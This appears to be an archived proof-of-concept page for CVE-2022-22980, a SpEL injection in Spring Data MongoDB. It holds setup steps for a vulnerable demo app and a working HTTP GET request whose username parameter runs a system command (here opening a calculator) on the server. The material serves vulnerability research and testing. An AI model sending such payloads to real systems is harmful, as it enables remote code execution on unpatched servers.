Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-22980 PoC — Spring Data MongoDB 安全漏洞

Source
https://github.com/jweny/cve-2022-22980
Associated Vulnerability
Title:Spring Data MongoDB 安全漏洞 (CVE-2022-22980)
Description:A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized.
Description
CVE-2022-22980 exp && 靶场
Readme
# spring-data-mongodb-cve-2022-22980-exp

鸡肋漏洞,只是记录。

1. 启动redis,27017端口

2. 启动项目,springboot启动在6666端口

   ![image-20220622155615142](docs/image-20220622155615142.png)

3. ![image-20220622155830238](docs/image-20220622155830238.png)

```
GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2


```

参考:

- https://github.com/li8u99/Spring-Data-Mongodb-Demo
- https://github.com/trganda/CVE-2022-22980
File Snapshot

 [4.0K]  /data/pocs/ce1aa477f09651c7ff08f78142e371e553278fac
├── [4.0K]  docs
│   ├── [505K]  image-20220622155615142.png
│   └── [364K]  image-20220622155830238.png
├── [1.7K]  pom.xml
├── [ 793]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  example
        │           └── [4.0K]  mongodb
        │               ├── [4.0K]  controller
        │               │   └── [1.2K]  UserController.java
        │               ├── [4.0K]  model
        │               │   └── [ 852]  User.java
        │               ├── [ 323]  MongoExampleApplication.java
        │               └── [4.0K]  repository
        │                   └── [ 371]  UserRepository.java
        └── [4.0K]  resources
            └── [ 124]  application.properties

11 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →